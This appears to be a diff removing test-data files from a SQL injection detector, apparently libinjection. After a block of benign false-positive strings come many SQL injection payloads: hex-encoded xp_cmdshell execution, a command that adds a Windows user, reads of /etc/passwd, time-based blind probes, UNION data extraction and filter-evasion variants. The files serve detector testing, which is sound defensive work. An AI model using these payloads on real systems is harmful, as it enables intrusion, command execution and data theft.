SUKAN / SET (2 PIECE) HAND WOVEN ORIGINAL SILK
|
||||
|
||||
# some base64 things?
|
||||
zzh7W_krs4jSNwVV2TssQsSbOj--
|
||||
1611-IioXXIG1ti8rspL2vbXFy--
|
||||
1611/IioXXIG1ti8rspL2vbXFy--
|
||||
|
||||
Mosaic "Table top"
|
||||
|
||||
# Used in HTTP headers, e.g. Accept: */*
|
||||
*/*
|
||||
"Dr. Who" and coffee
|
||||
"rose gold" necklace 14
|
||||
"flagging" -american -festive --peace -prayer -america -stripes -straws
|
||||
shabby "and white
|
||||
|
||||
"3 1'/3
|
||||
"*"
|
||||
necklace length 16" or 18"
|
||||
4 pcs- (5003-BK) 14mm Black
|
||||
"Keys"
|
||||
"dec"
|
||||
'countdown calendar" and "disney:
|
||||
1950 or 1960
|
||||
black and "shower curtain"
|
||||
dad and keychain and "loved by"
|
||||
if all else fails call grandma
|
||||
case 13"
|
||||
12.5 x 12.5"
|
||||
|
||||
O'connors UNION selected a few friendsf from a
|
||||
O'connors UNION selected a few friendsf from
|
||||
O'connors UNION selected a few friendsf fr
|
||||
O' UNION selected a few friends
|
||||
O'connors UNION selected a few friends
|
||||
1 I like having true friends
|
||||
I like having true friends
|
||||
I having true friends
|
||||
I was having true friends
|
||||
1 having
|
||||
|
||||
"1--"
|
||||
'1--'
|
||||
"1--
|
||||
'1--
|
||||
|
||||
1 collate these union documents
|
||||
17+inch+PC+LAPTOP+Sleeve%2FBag%2FCase+with+zipper+pocket+and+adjustable+strap
|
||||
|
||||
# from https://github.com/client9/libinjection/issues/49
|
||||
1,(1)
|
||||
Toronto, ON, Canada - (YYZ)
|
||||
1,1--
|
||||
(1)-x
|
||||
1 function (1)
|
||||
'/1x-
|
||||
# technically x OR 1
|
||||
#x|x||1
|
||||
select 'and'
|
||||
x/void(1)
|
||||
select x from y where
|
||||
x/*
|
||||
1x(((
|
||||
1),(1
|
||||
x, @x, @x
|
||||
|
||||
#
|
||||
1; exec will create the case 7
|
||||
`
|
||||
1234`
|
||||
junk <a href="../">foo.com</a>
|
||||
|
||||
|
||||
# bogus
|
||||
1alert(1)
|
||||
|
||||
foo 'null' bar
|
||||
User(foo),junk
|
||||
User(login_name),Images(url_170x135)
|
||||
mr and mrs table sign
|
||||
USPS 1-3 Day (USPS doesn't guarantee 3 day arrival)
|
||||
foo or bar add 1
|
||||
Apt is gated; call when you get here, and we'll come down to get it.
|
||||
DaVi - Open and Close Your Blinds With Your Phone!
|
||||
Foo and 80's Foo / Bar
|
||||
Work Time (Rosewood, Lavender, Bergamot, Grapefruit) Recommended
|
||||
Same as reward #1 however
|
||||
foobar sent you 1 message about
|
||||
4.7" & iPhone 6 Plus 5.5
|
||||
Family and friends having meal outdoors
|
||||
<table width="99%" border="0" cellpadding="1"'
|
||||
8-bit Limit (BRK)
|
||||
3rd space(s)
|
||||
Ink and White Out 2 in 1 Pen
|
||||
Reality check (2016)
|
||||
Please select pair #1
|
|
@ -1,30 +0,0 @@
|
|||
# https://twitter.com/ru_raz0r/status/750311113435283456
|
||||
#
|
||||
username'exec master..xp_cmdshell'ping 127.0.0.1' -- and password = 'test'
|
||||
username'declare @s varchar (8000); ...
|
||||
username'DECLARE @find varchar(30) = 'Man%'
|
||||
'begin declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s); end
|
||||
'goto label; label: declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'begin try select 1/0 end try begin catch declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end catch--
|
||||
'begin try declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end try begin catch print 1 end catch--
|
||||
'begin goto label declare @a varchar label: declare @s varchar (8000) set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end
|
||||
'begin goto label ALTER DATABASE pubs SET RECOVERY SIMPLE label: declare @s varchar (8000) set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'begin goto label select 1 label: @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'begin goto label label: declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s); end--
|
||||
'goto label label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label ALTER DATABASE pubs SET RECOVERY SIMPLE; label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label INSERT INTO Production.UnitMeasure (Name, UnitMeasureCode,ModifiedDate) VALUES (N'Square Yards', N'Y2', GETDATE()) label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label declare @a label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label select cast(@@version as varchar) label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label select @@version label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label select "a" label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label select 1 label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'select @@version; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'select 'a'; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'select 1; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'select @@version begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'select 'a' begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'select 1 begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'select @@version goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'select 'a' goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'select 1 goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x6576563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
|
@ -1,11 +0,0 @@
|
|||
# Not sure of original source
|
||||
# attributed to David Litchfield
|
||||
#
|
||||
234+%2B+%281+%2F+ASCII%28substring%28passwd%2C1%2C1%29%29-4%29
|
||||
foo%27+%2B+%281+%2F+ASCII%28substring%28passwd%2C1%2C1%29%29-4%29--
|
||||
|
||||
456+%2B+ASCII%28substring%28passwd%2C1%2C1%29%29-10
|
||||
foo%27%2B+ASCII%28substring%28passwd%2C1%2C1%29%29-10--
|
||||
|
||||
# overflow
|
||||
123%2B+%28%280+%2F+ascii%28substring%28passwd%2C1%2C1%29%29+%2A+4294967296%29
|
|
@ -1,73 +0,0 @@
|
|||
|
||||
# samples
|
||||
# unlikely to execute correctly
|
||||
# probably just generated automatically without regard for usefulness
|
||||
# but seen in wild "FIELD AND NUM=NUM"
|
||||
|
||||
# FAILS
|
||||
#"1*HOPE AND 8=3",
|
||||
#"0+HOPE AND 8=3",
|
||||
#"0+(HOPE) AND 8=3",
|
||||
HOPE%2A1+AND+8%3D3
|
||||
## HOPE%2A%281%29+AND+8%3D3
|
||||
|
||||
# RHS variations
|
||||
HOPE+AND+8%3D3
|
||||
HOPE+AND+-8%3D3
|
||||
HOPE+AND+-8%3D-3
|
||||
HOPE+AND+%28-8%29%3D%28-3%29
|
||||
HOPE+AND+%288%29%3D3
|
||||
HOPE+AND+8%3D%283%29
|
||||
HOPE+AND+%288%29%3D%283%29
|
||||
HOPE+AND+1%2B2%3D3%2B4
|
||||
HOPE+AND+COS%283%29%3DSIN%284%29
|
||||
|
||||
# lhs work arounds
|
||||
HOPE%2A1+AND+8%3D3
|
||||
## HOPE%2A%281%29+AND+8%3D3
|
||||
%28HOPE%29+AND+8%3D3
|
||||
%28HOPE%29%2A1+AND+8%3D3
|
||||
%28HOPE%29%2B0+AND+8%3D3
|
||||
1%2A%28HOPE%29+AND+8%3D3
|
||||
%281%29%2A%28HOPE%29+AND+8%3D3
|
||||
%281%29%2AHOPE+AND+8%3D3
|
||||
%28%281%29%29%2AHOPE+AND+8%3D3
|
||||
%28%281%29%29%2A%28HOPE%29+AND+8%3D3
|
||||
%28%281%29%29%2A%28%28HOPE%29%29+AND+8%3D3
|
||||
%28%28%281%29%29%29%2AHOPE+AND+8%3D3
|
||||
%28%28%28%281%29%29%29%29%2AHOPE+AND+8%3D3
|
||||
|
||||
# based on NUM AND 1=1--
|
||||
PI%28%29+AND+COS%28PI%28%29%29%3D-1
|
||||
PI%28%29+%26%26+COS%28PI%28%29%29%3D-1
|
||||
FLOOR%28PI%28%29%29+AND+SIN%28PI%28%29%29%3D0
|
||||
-9-%282%29+OR+1+%3D+1
|
||||
8-9+OR+1+%3D+1
|
||||
-9-%282%29+OR+1+%3D+1
|
||||
-9-%28%282%29%29+OR+1+%3D+1
|
||||
-9-%28%28%282%29%29%29+OR+1+%3D+1
|
||||
%7E9-%282%29+OR+1+%3D+%7E1
|
||||
a%27%2712%27+and+%28pi%28%29%3Dpi%28%29%29--
|
||||
a%27%2712%27+and+pi%28%29%3Dpi%28%29--
|
||||
dingberry%27%271%27+and+%28false%29--
|
||||
dingberry%27%271%27+and+%28pi%28%29%3D3%29--
|
||||
dingberry%27%271%27+and+%283%3Dpi%28%29%29--
|
||||
1%27%2712%27+and+%283%3Dpi%28%29%29--
|
||||
1%27%2B%2712%27+and+%283%3Dpi%28%29%29--
|
||||
1%27%2B%28%2712%27%29+and+%283%3Dpi%28%29%29--
|
||||
1%27%2B%28%28%2712%27%29%29+and+%283%3Dpi%28%29%29--
|
||||
1%27%2B%28%28%28%2712%27%29%29%29+and+%283%3Dpi%28%29%29--
|
||||
1%2B%28%2712%27%29+and+%283%3Dpi%28%29%29--
|
||||
1%2Bpi%28%29+and+%283%3Dpi%28%29%29--
|
||||
1%2B%28pi%28%29%29+and+%283%3Dpi%28%29%29--
|
||||
1%2B%28%28pi%28%29%29%29+and+%283%3Dpi%28%29%29--
|
||||
1%2B%28%28%28pi%28%29%29%29%29+and+%283%3Dpi%28%29%29--
|
||||
1%27%2Bpi%28%29+and+%283%3Dpi%28%29%29--
|
||||
1234%27%27z%27+and+%283%3Dpi%28%29%29--
|
||||
foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D21--
|
||||
foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D%2821%29--
|
||||
foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D21--
|
||||
foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D%287%2A3%29--
|
||||
foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D%287%2A3%29--
|
||||
foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D7%2A3--
|
||||
foo%27+and+%281%2B2%2B3%2B%284%2B5%2B6%29%29%3D7%2A3--
|
|
@ -1,15 +0,0 @@
|
|||
#
|
||||
# from http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/
|
||||
#
|
||||
999999 or 1=1 or 1=1
|
||||
' or 1=1 or '1'='1
|
||||
" or 1=1 or "1"="1
|
||||
999999) or 1=1 or (1=1
|
||||
') or 1=1 or ('1'='1
|
||||
") or 1=1 or ("1"="1
|
||||
999999)) or 1=1 or ((1=1
|
||||
')) or 1=1 or (('1'='1
|
||||
")) or 1=1 or (("1"="1
|
||||
999999))) or 1=1 or (((1
|
||||
'))) or 1=1 or ((('1'='1
|
||||
"))) or 1=1 or ((("1"="1
|
|
@ -1,44 +0,0 @@
|
|||
#
|
||||
# http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/
|
||||
#
|
||||
1 or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or 1=1
|
||||
(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)
|
||||
(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6) as test
|
||||
9999' or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or '0'='9999
|
||||
9999" or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or "0"="9999
|
||||
9999'+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+'9999
|
||||
9999"+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+"9999
|
||||
9999'||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||'9999
|
||||
9999"||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||"9999
|
||||
(select like('abcdefg',upper(hex(randomblob(150000000))))) as test
|
||||
(select like('abcdefg',upper(hex(randomblob(150000000)))))
|
||||
9999'||(select like('abcdefg',upper(hex(randomblob(150000000)))))||'9999
|
||||
9999"||(select like('abcdefg',upper(hex(randomblob(150000000)))))||"9999
|
||||
(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5) as test
|
||||
(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)
|
||||
9999'||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||'9999
|
||||
9999"||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||"9999
|
||||
(select benchmark(15000000,md5(0x4e446b6e))-9999) as test
|
||||
benchmark(15000000,md5(0x4e446b6e))-9999
|
||||
9999' or benchmark(15000000,md5(0x4e446b6e)) or '0'='9999
|
||||
9999" or benchmark(15000000,md5(0x4e446b6e)) or "0"="9999
|
||||
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7) as test
|
||||
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)
|
||||
9999'+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+'9999
|
||||
9999"+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+"9999
|
||||
(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3) as test
|
||||
(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)
|
||||
9999'||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||'9999
|
||||
9999"||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||"9999
|
||||
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3) as test
|
||||
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)
|
||||
9999'||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||'9999
|
||||
9999"||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||"9999
|
||||
(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3) as test
|
||||
(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)
|
||||
9999'||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||'9999
|
||||
9999"||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||"9999
|
||||
(select 99999999 from pg_sleep(15)) as test
|
||||
(select 99999999 from pg_sleep(15))
|
||||
9999'||(select 99999999 from pg_sleep(15))||'9999
|
||||
9999"||(select 99999999 from pg_sleep(15))||"9999
|
|
@ -1,15 +0,0 @@
|
|||
# http://www.blackhatlibrary.net/Comparative_precomputation
|
||||
ascii(substring(version() from 1 for 1))
|
||||
length((select length(version())))
|
||||
ascii(substring(length(version()),1,1))
|
||||
(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=1)
|
||||
(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=ascii(substring(version() from 1 for 1)))
|
||||
vulnerable_site' and 1=5 or title=() #'
|
||||
conv(hex(substr(version() FROM 1 FOR 2)),16,10)
|
||||
conv(hex(substr(version() FROM 1 FOR 2)),16,10) >> 0x6
|
||||
conv(hex(substr(version() FROM 2 FOR 2)),16,10) << 0x2 >> 0x6
|
||||
uncompress(compress(version()))
|
||||
LENGTH(compress(version()))
|
||||
LENGTH(version())
|
||||
LENGTH(load_file('/etc/passwd'))
|
||||
LENGTH(compress(load_file('/etc/passwd')))
|
|
@ -1,40 +0,0 @@
|
|||
# http://www.exploit-db.com/papers/17934/
|
||||
# A few typos corrected
|
||||
|
||||
1+or+1+%3D+1
|
||||
1+%7C%7C+1+%3D+1
|
||||
1+and+1+%3D+1
|
||||
1+%26%26+1+%3D+1
|
||||
1+%7C%7C+%28select+user+from+users+where+user_id+%3D+1%29+%3D+%27admin%27
|
||||
1+%7C%7C+%28select+user+from+users+where+user_id+%3D+1%29+%3D+%27admin%27
|
||||
1+%7C%7C+%28select+user+from+users+limit+1%29+%3D+%27admin%27
|
||||
1+%7C%7C+%28select+user+from+users+group+by+user_id+having+user_id+%3D+1%29+%3D+%27admin%27
|
||||
1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users+%29+%3D+1
|
||||
1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users%29+%3D+1
|
||||
1+%7C%7C+1+%3D+1+into+outfile+%27result.txt%27
|
||||
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+%27a%27
|
||||
1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users%29+%3D+1
|
||||
1+%7C%7C+user_id+is+not+null
|
||||
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+0x61
|
||||
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+unhex%2861%29
|
||||
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+lower%28conv%2811%2C10%2C36%29%29
|
||||
1+%7C%7C+lpad%28user%2C7%2C1%29
|
||||
1%0b||%0blpad(user,7,1)
|
||||
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+%3D+%27users%27
|
||||
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+%27a%27+and+%27z%27
|
||||
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+char%2897%29+and+char%28122%29
|
||||
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+0x61+and+0x7a
|
||||
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+like+0x7573657273
|
||||
1+UnIoN/**/SeLecT/**/1,2,3--
|
||||
# double url-encoded
|
||||
## 21%252f%252a*/union%252f%252a*/select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
|
||||
21%2f%2a*/union%2f%2a*/select%2f%2a*/1,2,3%2f%2a*/from%2f%2a*/users--
|
||||
1+/**/union/**/select
|
||||
1+/%2A%2A/union/%2A%2A/select
|
||||
1+%2f**%2funion%2f**%2fselect
|
||||
0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
|
||||
0+div+1+union+select+1%2C2%2Ccurrent_user
|
||||
1+and+(select 1)=(select+0x414141414141441414141414114141414141414141414141414141414141414141.)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
|
||||
1/*!UnIoN*/SeLecT+1,2,3--
|
||||
=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables+*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
|
||||
1%27%3B+%2F%2A%26id%3D1%2A%2F+EXEC+%2F%2A%26id%3D1%2A%2F+master..xp_cmdshell+%2F%2A%26id%3D1%2A%2F+net+user+lucifer+UrWaFisShiT+%2F%2A%26id%3D1%2A%2F+--
|
|
@ -1,131 +0,0 @@
|
|||
#
|
||||
# Frequently not SQLi but
|
||||
#
|
||||
select 1 from foo where
|
||||
select @version from foo where
|
||||
select 'foo' from bar where
|
||||
# select 1,1,1,1,1,1,1
|
||||
# select @version,@version,@version
|
||||
# select 'foo','bar',1,2,3,4
|
||||
|
||||
select sin(1),2 from bar where
|
||||
select sin(id),2 from bar where
|
||||
select sin('1'),2 from bar where
|
||||
select sin(@version),2 from bar where
|
||||
select sin((1)),2 from bar where
|
||||
select sin((id)),2 from bar where
|
||||
select sin(('1')),2 from bar where
|
||||
select sin((@version)),2 from bar where
|
||||
select sin(((1)),2 from bar where
|
||||
select sin(((id)),2 from bar where
|
||||
select sin((('1')),2 from bar where
|
||||
select sin(((@version)),2 from bar where
|
||||
|
||||
select -sin(1),2 from bar where
|
||||
select -sin(id),2 from bar where
|
||||
select -sin('1'),2 from bar where
|
||||
select -sin(@version),2 from bar where
|
||||
select -sin((1)),2 from bar where
|
||||
select -sin((id)),2 from bar where
|
||||
select -sin(('1')),2 from bar where
|
||||
select -sin((@version)),2 from bar where
|
||||
select -sin(((1)),2 from bar where
|
||||
select -sin(((id)),2 from bar where
|
||||
select -sin((('1')),2 from bar where
|
||||
select -sin(((@version)),2 from bar where
|
||||
|
||||
select 1,sin(1),2 from bar where
|
||||
select 1,sin(id),2 from bar where
|
||||
select 1,sin('1'),2 from bar where
|
||||
select 1,sin(@version),2 from bar where
|
||||
select 1,sin((1)),2 from bar where
|
||||
select 1,sin((id)),2 from bar where
|
||||
select 1,sin(('1')),2 from bar where
|
||||
select 1,sin((@version)),2 from bar where
|
||||
select 1,sin(((1)),2 from bar where
|
||||
select 1,sin(((id)),2 from bar where
|
||||
select 1,sin((('1')),2 from bar where
|
||||
select 1,sin(((@version)),2 from bar where
|
||||
|
||||
select -1,sin(1),2 from bar where
|
||||
select -1,sin(id),2 from bar where
|
||||
select -1,sin('1'),2 from bar where
|
||||
select -1,sin(@version),2 from bar where
|
||||
select -1,sin((1)),2 from bar where
|
||||
select -1,sin((id)),2 from bar where
|
||||
select -1,sin(('1')),2 from bar where
|
||||
select -1,sin((@version)),2 from bar where
|
||||
select -1,sin(((1)),2 from bar where
|
||||
select -1,sin(((id)),2 from bar where
|
||||
select -1,sin((('1')),2 from bar where
|
||||
select -1,sin(((@version)),2 from bar where
|
||||
|
||||
select id,sin(1),2 from bar where
|
||||
select id,sin(id),2 from bar where
|
||||
select id,sin('1'),2 from bar where
|
||||
select id,sin(@version),2 from bar where
|
||||
select id,sin((1)),2 from bar where
|
||||
select id,sin((id)),2 from bar where
|
||||
select id,sin(('1')),2 from bar where
|
||||
select id,sin((@version)),2 from bar where
|
||||
select id,sin(((1)),2 from bar where
|
||||
select id,sin(((id)),2 from bar where
|
||||
select id,sin((('1')),2 from bar where
|
||||
select id,sin(((@version)),2 from bar where
|
||||
|
||||
select @version,sin(1),2 from bar where
|
||||
select @version,sin(id),2 from bar where
|
||||
select @version,sin('1'),2 from bar where
|
||||
select @version,sin(@version),2 from bar where
|
||||
select @version,sin((1)),2 from bar where
|
||||
select @version,sin((id)),2 from bar where
|
||||
select @version,sin(('1')),2 from bar where
|
||||
select @version,sin((@version)),2 from bar where
|
||||
select @version,sin(((1)),2 from bar where
|
||||
select @version,sin(((id)),2 from bar where
|
||||
select @version,sin((('1')),2 from bar where
|
||||
select @version,sin(((@version)),2 from bar where
|
||||
|
||||
select '1',sin(1),2 from bar where
|
||||
select '1',sin(id),2 from bar where
|
||||
select '1',sin('1'),2 from bar where
|
||||
select '1',sin(@version),2 from bar where
|
||||
select '1',sin((1)),2 from bar where
|
||||
select '1',sin((id)),2 from bar where
|
||||
select '1',sin(('1')),2 from bar where
|
||||
select '1',sin((@version)),2 from bar where
|
||||
select '1',sin(((1)),2 from bar where
|
||||
select '1',sin(((id)),2 from bar where
|
||||
select '1',sin((('1')),2 from bar where
|
||||
select '1',sin(((@version)),2 from bar where
|
||||
|
||||
select -'1',sin(1),2 from bar where
|
||||
select -'1',sin(id),2 from bar where
|
||||
select -'1',sin('1'),2 from bar where
|
||||
select -'1',sin(@version),2 from bar where
|
||||
select -'1',sin((1)),2 from bar where
|
||||
select -'1',sin((id)),2 from bar where
|
||||
select -'1',sin(('1')),2 from bar where
|
||||
select -'1',sin((@version)),2 from bar where
|
||||
select -'1',sin(((1)),2 from bar where
|
||||
select -'1',sin(((id)),2 from bar where
|
||||
select -'1',sin((('1')),2 from bar where
|
||||
select -'1',sin(((@version)),2 from bar where
|
||||
|
||||
select 1,(2),3 from bar where
|
||||
select (1),(2),3 from bar where
|
||||
select ((1)),(2),3 from bar where
|
||||
select (((1))),(2),3 from bar where
|
||||
select ('1'),(2),3 from bar where
|
||||
select (('1')),(2),3 from bar where
|
||||
select ((('1'))),(2),3 from bar where
|
||||
select (@version),(2),3 from bar where
|
||||
select ((@version)),(2),3 from bar where
|
||||
select (((@version))),(2),3 from bar where
|
||||
select (id),(2),3 from bar where
|
||||
select ((id)),(2),3 from bar where
|
||||
select (((id))),(2),3 from bar where
|
||||
|
||||
select (@version),(2),3 from bar where
|
||||
select (((((1,2,3,4)))) from bar
|
||||
|
|
@ -1,315 +0,0 @@
|
|||
#
|
||||
#
|
||||
#
|
||||
( 'a' ) --
|
||||
' - ( (SELECT BINARY ( 'b')) ) --
|
||||
' - ( ( BINARY COS ( 'b')) ) --
|
||||
' - ( BINARY BINARY ( 'b') ) --
|
||||
( 1 OR 1 ) --
|
||||
( 1 OR @a ) --
|
||||
( ( 1 ) ) --
|
||||
( 1 * @a ) --
|
||||
( (SELECT ( 1)) ) --
|
||||
( (SELECT ( @a)) ) --
|
||||
( BINARY ( 1) ) --
|
||||
( BINARY ( @a) ) --
|
||||
( @a OR 1 ) --
|
||||
( @a OR @a ) --
|
||||
( ( @a ) ) --
|
||||
( ( 1 OR 'b') ) --
|
||||
( ( 1 * 'b') ) --
|
||||
( (SELECT ( SELECT 'b')) ) --
|
||||
( ( SELECT ( 'b')) ) --
|
||||
( (SELECT 1 OR 'b') ) --
|
||||
( (SELECT 'a' OR 'b') ) --
|
||||
( (SELECT BINARY ( 'b')) ) --
|
||||
( (SELECT BINARY COS ( 'b')) ) --
|
||||
( (SELECT @a OR 'b') ) --
|
||||
( COS ( 1 OR 'b') ) --
|
||||
( COS ( 'a' OR 'b') ) --
